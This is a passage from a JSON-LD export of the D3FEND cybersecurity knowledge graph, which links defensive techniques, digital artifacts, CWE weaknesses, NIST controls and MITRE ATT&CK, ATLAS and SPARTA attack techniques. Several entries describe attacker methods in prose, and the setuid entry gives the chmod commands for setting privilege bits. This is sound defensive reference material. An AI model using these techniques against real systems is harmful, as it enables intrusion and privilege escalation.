      "@id": "_:Nf3f485e9b5e14a8590bd4df4bb6bc409",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:creates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemConfigurationDatabase"
      }
    },
    {
      "@id": "_:N90efda12122449c08685f4f2b5a8bb21",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SystemCall"
      }
    },
    {
      "@id": "d3f:DigitalAudio",
      "@type": "owl:Class",
      "d3f:definition": "Digital audio is a representation of sound recorded in, or converted into, digital form.",
      "rdfs:isDefinedBy": "https://dbpedia.org/page/Digital_audio",
      "rdfs:label": "Digital Audio",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalMedia"
      }
    },
    {
      "@id": "d3f:DecoySessionToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:DecoySessionToken"
      ],
      "d3f:d3fend-id": "D3-DST",
      "d3f:definition": "An authentication token created for the purposes of deceiving an adversary.",
      "d3f:kb-article": "## How it works\nUsage of decoy session tokens may be monitored to track attacker behavior or otherwise control the beliefs of the attacker.\n\n## Considerations\n* Interaction and activity with the decoy session token must be constantly monitored and analyzed to detect unauthorized activity.\n* Session tokens are typically short-lived and therefore the decoy must be continuously updated to provide the appearance of it being used in the production environment.\n* Automated tools can assist with maintenance and updates by automatically adjusting the decoy session token and environment to mimic the production environment.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-DecoyAndDeceptiveDataObjectTechnology_CymmetriaInc"
      },
      "d3f:spoofs": {
        "@id": "d3f:SessionToken"
      },
      "rdfs:label": "Decoy Session Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DecoyObject"
        },
        {
          "@id": "_:Nd4cbf2877c4b47bea7bec59609261366"
        }
      ]
    },
    {
      "@id": "_:Nd4cbf2877c4b47bea7bec59609261366",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:spoofs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:SessionToken"
      }
    },
    {
      "@id": "d3f:CWE-1234",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1234",
      "d3f:definition": "System configuration protection may be bypassed during debug mode.",
      "rdfs:label": "Hardware Internal or Debug Modes Allow Override of Locks",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-667"
      }
    },
    {
      "@id": "d3f:GetOpenSockets",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enumerates": {
        "@id": "d3f:Pipe"
      },
      "rdfs:label": "Get Open Sockets",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:SystemCall"
        },
        {
          "@id": "_:N4980b68798b740549111b6f02bc62a1b"
        }
      ]
    },
    {
      "@id": "_:N4980b68798b740549111b6f02bc62a1b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enumerates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pipe"
      }
    },
    {
      "@id": "d3f:restricted-by",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x restricted-by y: The entity x is limited, constrained, or regulated by entity y.",
      "owl:inverseOf": {
        "@id": "d3f:restricts"
      },
      "rdfs:label": "restricted-by",
      "rdfs:subPropertyOf": {
        "@id": "d3f:associated-with"
      }
    },
    {
      "@id": "d3f:T1078",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1078",
      "d3f:definition": "Adversaries may obtain and abuse credentials of existing accounts as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Compromised credentials may be used to bypass access controls placed on various resources on systems within the network and may even be used for persistent access to remote systems and externally available services, such as VPNs, Outlook Web Access, network devices, and remote desktop.(Citation: volexity_0day_sophos_FW) Compromised credentials may also grant an adversary increased privilege to specific systems or access to restricted areas of the network. Adversaries may choose not to use malware or tools in conjunction with the legitimate access those credentials provide to make it harder to detect their presence.",
      "d3f:produces": [
        {
          "@id": "d3f:Authentication"
        },
        {
          "@id": "d3f:Authorization"
        }
      ],
      "d3f:uses": {
        "@id": "d3f:UserAccount"
      },
      "rdfs:label": "Valid Accounts",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DefenseEvasionTechnique"
        },
        {
          "@id": "d3f:InitialAccessTechnique"
        },
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        },
        {
          "@id": "_:N89b595d1f7aa4cd0863cd25d3bb8515f"
        },
        {
          "@id": "_:Nf0a4e71cc72549399fcc8c5da1e4ec95"
        },
        {
          "@id": "_:N4cd32021f7f847018f518a6acbda8b9a"
        }
      ]
    },
    {
      "@id": "_:N89b595d1f7aa4cd0863cd25d3bb8515f",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authentication"
      }
    },
    {
      "@id": "_:Nf0a4e71cc72549399fcc8c5da1e4ec95",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:produces"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Authorization"
      }
    },
    {
      "@id": "_:N4cd32021f7f847018f518a6acbda8b9a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:uses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:UserAccount"
      }
    },
    {
      "@id": "d3f:T1129",
      "@type": "owl:Class",
      "d3f:attack-id": "T1129",
      "d3f:definition": "Adversaries may execute malicious payloads via loading shared modules. Shared modules are executable files that are loaded into processes to provide access to reusable code, such as specific custom functions or invoking OS API functions (i.e., [Native API](https://attack.mitre.org/techniques/T1106)).",
      "rdfs:label": "Shared Modules",
      "rdfs:subClassOf": {
        "@id": "d3f:ExecutionTechnique"
      }
    },
    {
      "@id": "d3f:DE-0003.07",
      "@type": "owl:Class",
      "d3f:attack-id": "DE-0003.07",
      "d3f:definition": "Many missions separate authentication from confidentiality and allow on-orbit selection of algorithms, keys, profiles, or “crypto off/clear” states. Adversaries manipulate these mode controls and selectors to desynchronize ground and space or to hide content: flipping to a profile that the ground is not using, requesting clear telemetry while maintaining authenticated uplink, or rotating key IDs so frames validate internally but appear undecodable to external tools. Mode indicators and status words can also be biased so ground displays show expected settings while the link actually operates under attacker-chosen parameters, masking command and data exchanges within normal-looking traffic.",
      "rdfs:label": "Cryptographic Modes - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/DE-0003/07/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:DE-0003"
      },
      "skos:prefLabel": "Cryptographic Modes"
    },
    {
      "@id": "d3f:WebApplicationServer",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A web application server is a web server that hosts applications. Application server frameworks are software frameworks for building application servers. An application server framework provides both facilities to create web applications and a server environment to run them. In the case of Java application servers, the server behaves like an extended virtual machine for running applications, transparently handling connections to the database on one side, and, often, connections to the Web client on the other.",
      "d3f:runs": {
        "@id": "d3f:WebApplication"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Application_server"
      },
      "rdfs:label": "Web Application Server",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:WebServer"
        },
        {
          "@id": "_:N63472e8de4aa432696a58a10aea81903"
        }
      ]
    },
    {
      "@id": "_:N63472e8de4aa432696a58a10aea81903",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:runs"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WebApplication"
      }
    },
    {
      "@id": "d3f:Database",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": {
        "@id": "d3f:DatabaseRecord"
      },
      "d3f:definition": "A database is an organized collection of data, generally stored and accessed electronically from a computer system. Where databases are more complex they are often developed using formal design and modeling techniques.",
      "d3f:may-contain": {
        "@id": "d3f:StoredProcedure"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Database"
      },
      "rdfs:label": "Database",
      "rdfs:seeAlso": {
        "@id": "dbr:Database"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:Naf73dbe1a7a140a88a3aa72c5543a2a2"
        },
        {
          "@id": "_:N116f8e126e0a484c8ba2a69d522d8093"
        }
      ]
    },
    {
      "@id": "_:Naf73dbe1a7a140a88a3aa72c5543a2a2",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:DatabaseRecord"
      }
    },
    {
      "@id": "_:N116f8e126e0a484c8ba2a69d522d8093",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:StoredProcedure"
      }
    },
    {
      "@id": "d3f:T1047",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:attack-id": "T1047",
      "d3f:definition": "Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is designed for programmers and is the infrastructure for management data and operations on Windows systems.(Citation: WMI 1-3) WMI is an administration feature that provides a uniform environment to access Windows system components.",
      "d3f:may-create": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      },
      "d3f:may-invoke": {
        "@id": "d3f:CreateProcess"
      },
      "rdfs:label": "Windows Management Instrumentation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExecutionTechnique"
        },
        {
          "@id": "_:N064ce05822da47f88927ab5dfe9581e9"
        },
        {
          "@id": "_:Nfe587432305149a4806807fd451893d1"
        }
      ]
    },
    {
      "@id": "_:N064ce05822da47f88927ab5dfe9581e9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-create"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:IntranetAdministrativeNetworkTraffic"
      }
    },
    {
      "@id": "_:Nfe587432305149a4806807fd451893d1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-invoke"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CreateProcess"
      }
    },
    {
      "@id": "d3f:ProxyServer",
      "@type": "owl:Class",
      "d3f:definition": "In computer networking, a proxy server is a server application or appliance that acts as an intermediary for requests from clients seeking resources from servers that provide those resources. A proxy server thus functions on behalf of the client when requesting service, potentially masking the true origin of the request to the resource server.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Proxy_server"
      },
      "rdfs:label": "Proxy Server",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/network_proxy"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ComputerNetworkNode"
        },
        {
          "@id": "d3f:Server"
        }
      ]
    },
    {
      "@id": "rdfs:label",
      "@type": "owl:AnnotationProperty"
    },
    {
      "@id": "d3f:Reference-SecretsManagementCheatSheet-OWASP",
      "@type": [
        "owl:NamedIndividual",
        "d3f:InternetArticleReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://cheatsheetseries.owasp.org/cheatsheets/Secrets_Management_Cheat_Sheet.html"
      },
      "d3f:kb-abstract": "The OWASP Secrets Management Cheat Sheet provides clear directives for securely managing sensitive data like API keys and credentials. It emphasizes centralized control for storage, provisioning, and auditing to prevent unauthorized access. Adopting strong rotation and management protocols is essential for maintaining security and integrity in DevOps environments.",
      "d3f:kb-author": "OWASP",
      "d3f:kb-reference-of": {
        "@id": "d3f:CredentialScrubbing"
      },
      "d3f:kb-reference-title": "Secrets Management Cheat Sheet",
      "rdfs:label": "Secrets Management Cheat Sheet"
    },
    {
      "@id": "d3f:T1458",
      "@type": "owl:Class",
      "d3f:attack-id": "T1458",
      "d3f:definition": "Adversaries may move onto devices by exploiting or copying malware to devices connected via USB. In the case of Lateral Movement, adversaries may utilize the physical connection of a device to a compromised or malicious charging station or PC to bypass application store requirements and install malicious applications directly.(Citation: Lau-Mactans) In the case of Initial Access, adversaries may attempt to exploit the device via the connection to gain access to data stored on the device.(Citation: Krebs-JuiceJacking) Examples of this include:",
      "rdfs:label": "Replication Through Removable Media - ATTACK Mobile",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKMobileInitialAccessTechnique"
        },
        {
          "@id": "d3f:ATTACKMobileLateralMovementTechnique"
        }
      ],
      "skos:prefLabel": "Replication Through Removable Media"
    },
    {
      "@id": "d3f:T1166",
      "@type": "owl:Class",
      "d3f:attack-id": "T1166",
      "d3f:definition": "When the setuid or setgid bits are set on Linux or macOS for an application, this means that the application will run with the privileges of the owning user or group respectively  (Citation: setuid man page). Normally an application is run in the current user’s context, regardless of which user or group owns the application. There are instances where programs need to be executed in an elevated context to function properly, but the user running them doesn’t need the elevated privileges. Instead of creating an entry in the sudoers file, which must be done by root, any user can specify the setuid or setgid flag to be set for their own applications. These bits are indicated with an \"s\" instead of an \"x\" when viewing a file's attributes via <code>ls -l</code>. The <code>chmod</code> program can set these bits with via bitmasking, <code>chmod 4777 [file]</code> or via shorthand naming, <code>chmod u+s [file]</code>.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been revoked by T1548.001",
      "rdfs:label": "Setuid and Setgid",
      "rdfs:seeAlso": {
        "@id": "d3f:T1548.001"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:NIST_SP_800-53_R5_SC-2_1",
      "@type": [
        "owl:NamedIndividual",
        "d3f:NISTControl"
      ],
      "d3f:control-name": "Separation of System and User Functionality | Interfaces for Non-privileged Users",
      "d3f:member-of": {
        "@id": "d3f:NIST_SP_800-53_R5"
      },
      "d3f:narrower": [
        {
          "@id": "d3f:LocalFilePermissions"
        },
        {
          "@id": "d3f:SystemConfigurationPermissions"
        }
      ],
      "rdfs:label": "SC-2(1)"
    },
    {
      "@id": "d3f:CWE-134",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-134",
      "d3f:definition": "The product uses a function that accepts a format string as an argument, but the format string originates from an external source.",
      "rdfs:label": "Use of Externally-Controlled Format String",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-668"
      }
    },
    {
      "@id": "d3f:AML.TA0014",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:attack-id": "AML.TA0014",
      "d3f:definition": "The adversary is trying to communicate with compromised AI systems to control them.\n\nCommand and Control consists of techniques that adversaries may use to communicate with systems under their control within a victim network. Adversaries commonly attempt to mimic normal, expected traffic to avoid detection. There are many ways an adversary can establish command and control with various levels of stealth depending on the victim's network structure and defenses.",
      "rdfs:label": "Command and Control - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/tactics/AML.TA0014"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATLASTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ],
      "skos:prefLabel": "Command and Control"
    },
    {
      "@id": "d3f:CCI-002347_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:FileAccessPatternAnalysis"
        },
        {
          "@id": "d3f:InputDeviceAnalysis"
        },
        {
          "@id": "d3f:ResourceAccessPatternAnalysis"
        },
        {
          "@id": "d3f:UserDataTransferAnalysis"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The organization employs organization-defined data mining detection techniques for organization-defined data storage objects to adequately detect data mining attempts.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-25T00:00:00"
      },
      "rdfs:label": "CCI-002347"
    },
    {
      "@id": "d3f:WebIdentityToken",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An ID token is an artifact that proves that the user has been authenticated.",
      "d3f:kb-article": "## How it works\n\nAn ID token is proof of the user's authentication. An ID token is encoded as a JSON Web Token (JWT), a standard format that allows your application to easily inspect its content, and make sure it comes from the expected issuer and that no one else changed it.",
      "d3f:signed-by": {
        "@id": "d3f:CryptographicKey"
      },
      "d3f:synonym": "Identity Token",
      "rdfs:isDefinedBy": {
        "@id": "https://auth0.com/blog/id-token-access-token-what-is-the-difference/"
      },
      "rdfs:label": "Web Identity Token",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Credential"
        },
        {
          "@id": "_:N5b20d50a63654d8b8831c935e6d946c4"
        }
      ]
    },
    {
      "@id": "_:N5b20d50a63654d8b8831c935e6d946c4",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:signed-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:CryptographicKey"
      }
    },
    {
      "@id": "d3f:Reference-ThreatDetectionForReturnOrientedProgramming_CrowdstrikeInc",
      "@type": [
        "owl:NamedIndividual",
        "d3f:PatentReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://patents.google.com/patent/US20140075556A1"
      },
      "d3f:kb-abstract": "This disclosure describes, in part, techniques for detecting security exploits associated with return-oriented programming. The techniques include determining that a retrieved count is indicative of malicious activity, such as return oriented programming. The count may be retrieved from a processor performance counter of prediction mismatches, the prediction mismatches resulting from comparisons of a call stack of a computing device and of a shadow call stack maintained by a processor of the computing device. The techniques further include performing at least one security response action in response to determining that the count indicates malicious activity.",
      "d3f:kb-author": "Georg WICHERSKI",
      "d3f:kb-mitre-analysis": "This patent describes a technique for detecting shellcode security exploits. A call stack of a computing device is compared with a shadow call stack maintained by a processor of the computing device since a return oriented program may only be able to control or spoof the call stack and not the shadow call stack. Mismatches between the two are counted and if the number of mismatches exceeds a certain threshold it is an indication of malicious activity and a security response action is performed.",
      "d3f:kb-organization": "Crowdstrike Inc",
      "d3f:kb-reference-of": {
        "@id": "d3f:ShadowStackComparisons"
      },
      "d3f:kb-reference-title": "Threat detection for return oriented programming",
      "rdfs:label": "Reference - Threat detection for return oriented programming - Crowdstrike Inc"
    },
    {
      "@id": "d3f:T0833",
      "@type": "owl:Class",
      "d3f:attack-id": "T0833",
      "d3f:definition": "Adversaries may place malicious code in a system, which can cause the system to malfunction by modifying its control logic. Control system devices use programming languages (e.g. relay ladder logic) to control physical processes by affecting actuators, which cause machines to operate, based on environment sensor readings. These devices often include the ability to perform remote control logic updates.",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Modify Control Logic - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        },
        {
          "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
        }
      ],
      "skos:prefLabel": "Modify Control Logic"
    },
    {
      "@id": "d3f:Reference-RDPConnectionDetection_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2013-07-002"
      },
      "d3f:kb-abstract": "The Remote Desktop Protocol (RDP), built in to Microsoft operating systems, allows a user to remotely log in to the desktop of another host. It allows for interactive access of the running windows, and forwards key presses, mouse clicks, etc. Network administrators, power users, and end-users may use RDP for day-to-day operations. From an adversary's perspective, RDP provides a means to laterally move to a new host. Determining which RDP connections correspond to adversary activity can be a difficult problem in highly dynamic environments, but will be useful in identifying the scope of a compromise.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:RemoteTerminalSessionDetection"
      },
      "d3f:kb-reference-title": "CAR-2013-07-002: RDP Connection Detection",
      "rdfs:label": "Reference - CAR-2013-07-002: RDP Connection Detection - MITRE"
    },
    {
      "@id": "d3f:Enclave",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Network enclaves consist of standalone assets that do not interact with other information systems or networks. A major difference between a DMZ or demilitarized zone and a network enclave is a DMZ allows inbound and outbound traffic access, where firewall boundaries are traversed. In an enclave, firewall boundaries are not traversed. Enclave protection tools can be used to provide protection within specific security domains. These mechanisms are installed as part of an Intranet to connect networks that have similar security requirements.",
      "d3f:may-contain": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "rdfs:isDefinedBy": {
        "@id": "dbr:Network_enclave"
      },
      "rdfs:label": "Enclave",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N0dc526ec91974c4fa057cb5f6fae4ea9"
        }
      ],
      "skos:altLabel": "Network Enclave"
    },
    {
      "@id": "_:N0dc526ec91974c4fa057cb5f6fae4ea9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:may-contain"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:FileSystem",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:contains": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        },
        {
          "@id": "d3f:FileSystemLink"
        },
        {
          "@id": "d3f:FileSystemMetadata"
        }
      ],
      "d3f:definition": "In computing, a file system or filesystem is used to control how data is stored and retrieved. Without a file system, information placed in a storage medium would be one large body of data with no way to tell where one piece of information stops and the next begins. By separating the data into pieces and giving each piece a name, the information is easily isolated and identified. Taking its name from the way paper-based information systems are named, each group of data is called a \"file\". The structure and logic rules used to manage the groups of information and their names is called a \"file system\".",
      "rdfs:isDefinedBy": {
        "@id": "dbr:File_system"
      },
      "rdfs:label": "File System",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DigitalInformationBearer"
        },
        {
          "@id": "_:N751f45b804304be59486ebaf0940761b"
        },
        {
          "@id": "_:N5e1807f8768c4bc39653a708eed4d2af"
        },
        {
          "@id": "_:N9077a1a99e1448f295b3f66a35174edf"
        },
        {
          "@id": "_:N1fd2204546634bce9e522645f099a6d0"
        }
      ]
    },
    {
      "@id": "_:N751f45b804304be59486ebaf0940761b",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:N5e1807f8768c4bc39653a708eed4d2af",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:File"
      }
    },
    {
      "@id": "_:N9077a1a99e1448f295b3f66a35174edf",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemLink"
      }
    },
    {
      "@id": "_:N1fd2204546634bce9e522645f099a6d0",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:contains"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:FileSystemMetadata"
      }
    },
    {
      "@id": "d3f:NISTControl",
      "@type": "owl:Class",
      "rdfs:label": "NIST Control",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ExternalControl"
        },
        {
          "@id": "_:Nde3edb7fbd2e4b9295475b708c6f9379"
        }
      ]
    },
    {
      "@id": "_:Nde3edb7fbd2e4b9295475b708c6f9379",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:member-of"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:NISTSP800-53ControlCatalog"
      }
    },
    {
      "@id": "d3f:OTWriteCommand",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Write or store data.",
      "rdfs:comment": [
        "BACnet: atomicWriteFile\nBACnet: addListElement\nBACnet: removeListElement\nBACnet: createObject\nBACnet: deleteObject\nBACnet: writeProperty\nBACnet: writePropertyMultiple\nBACnet: write-group ",
        "CIP: Set Attributes All\nCIP: Set Attribute List\nCIP: Set Attribute Single\nCIP: Set Member\nCIP: Insert Member\nCIP: Remove Member ",
        "GE-SRTP: WRITE SYSTEM MEMORY\nGE-SRTP: WRITE TASK MEMORY ",
        "Modbus: Write Single Coil\nModbus: Write Single Register\nModbus: Write Multiple Coils\nModbus: Write Multiple Registers\nModbus: Write File Record\nModbus: Mask Write Register\nModbus: Read Write Register"
      ],
      "rdfs:label": "OT Write Command",
      "rdfs:seeAlso": [
        {
          "@id": "https://icscsi.org/library/Documents/ICS_Protocols/Control%20Microsystems%20-%20DNP3%20User%20and%20Reference%20Manual.pdf"
        },
        {
          "@id": "https://modbus.org/docs/Modbus_Application_Protocol_V1_1b3.pdf"
        },
        {
          "@id": "https://nvlpubs.nist.gov/nistpubs/TechnicalNotes/NIST.TN.2023.pdf"
        }
      ],
      "rdfs:subClassOf": {
        "@id": "d3f:OTProcessDataCommand"
      }
    },
    {
      "@id": "d3f:OTModifyControlProgramCommandEvent",
      "@type": "owl:Class",
      "d3f:definition": "OT command that adds, removes, or changes, process data on a remote device.",
      "rdfs:label": "OT Modify Control Program Command Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OTModifyDeviceConfigurationCommandEvent"
        },
        {
          "@id": "_:Ne3c71f0b8deb496c97cc252924580800"
        },
        {
          "@id": "_:N08f1531efb6844c6a5595f5d69d02562"
        }
      ]
    },
    {
      "@id": "_:Ne3c71f0b8deb496c97cc252924580800",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTControlProgram"
      }
    },
    {
      "@id": "_:N08f1531efb6844c6a5595f5d69d02562",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OTModifyControlProgramCommand"
      }
    },
    {
      "@id": "d3f:CWE-332",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-332",
      "d3f:definition": "The lack of entropy available for, or used by, a Pseudo-Random Number Generator (PRNG) can be a stability and security threat.",
      "rdfs:label": "Insufficient Entropy in PRNG",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-331"
      }
    },
    {
      "@id": "d3f:CWE-95",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-95",
      "d3f:definition": "The product receives input from an upstream component, but it does not neutralize or incorrectly neutralizes code syntax before using the input in a dynamic evaluation call (e.g. \"eval\").",
      "rdfs:label": "Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-94"
      }
    },
    {
      "@id": "d3f:CWE-1257",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1257",
      "d3f:definition": "Aliased or mirrored memory regions in hardware designs may have inconsistent read/write permissions enforced by the hardware. A possible result is that an untrusted agent is blocked from accessing a memory region but is not blocked from accessing the corresponding aliased memory region.",
      "rdfs:label": "Improper Access Control Applied to Mirrored or Aliased Memory Regions",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:WindowsCreateThread",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Creates a thread to execute within the virtual address space of the calling process.",
      "d3f:invokes": [
        {
          "@id": "d3f:WindowsNtCreateThread"
        },
        {
          "@id": "d3f:WindowsNtCreateThreadEx"
        }
      ],
      "rdfs:isDefinedBy": {
        "@id": "https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread"
      },
      "rdfs:label": "Windows CreateThread",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OSAPICreateThread"
        },
        {
          "@id": "_:N75734a8d310b4526aa2e566f623d8757"
        },
        {
          "@id": "_:N806e656cd8e3480da848aae02cb3497a"
        }
      ]
    },
    {
      "@id": "_:N75734a8d310b4526aa2e566f623d8757",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThread"
      }
    },
    {
      "@id": "_:N806e656cd8e3480da848aae02cb3497a",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:invokes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:WindowsNtCreateThreadEx"
      }
    },
    {
      "@id": "d3f:T1546",
      "@type": "owl:Class",
      "d3f:attack-id": "T1546",
      "d3f:definition": "Adversaries may establish persistence and/or elevate privileges using system mechanisms that trigger execution based on specific events. Various operating systems have means to monitor and subscribe to events such as logons or other user activity such as running specific applications/binaries. Cloud environments may also support various functions and services that monitor and can be invoked in response to specific cloud events.(Citation: Backdooring an AWS account)(Citation: Varonis Power Automate Data Exfiltration)(Citation: Microsoft DART Case Report 001)",
      "rdfs:label": "Event Triggered Execution",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:PersistenceTechnique"
        },
        {
          "@id": "d3f:PrivilegeEscalationTechnique"
        }
      ]
    },
    {
      "@id": "d3f:SystemConfigurationDatabaseRecord",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A database record holding information used to configure the services, parameters, and initial settings for an operating system.",
      "rdfs:label": "System Configuration Database Record",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ConfigurationDatabaseRecord"
        },
        {
          "@id": "d3f:OperatingSystemConfigurationComponent"
        }
      ]
    },
    {
      "@id": "d3f:CWE-177",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-177",
      "d3f:definition": "The product does not properly handle when all or part of an input has been URL encoded.",
      "rdfs:label": "Improper Handling of URL Encoding (Hex Encoding)",
      "rdfs:subClassOf": {
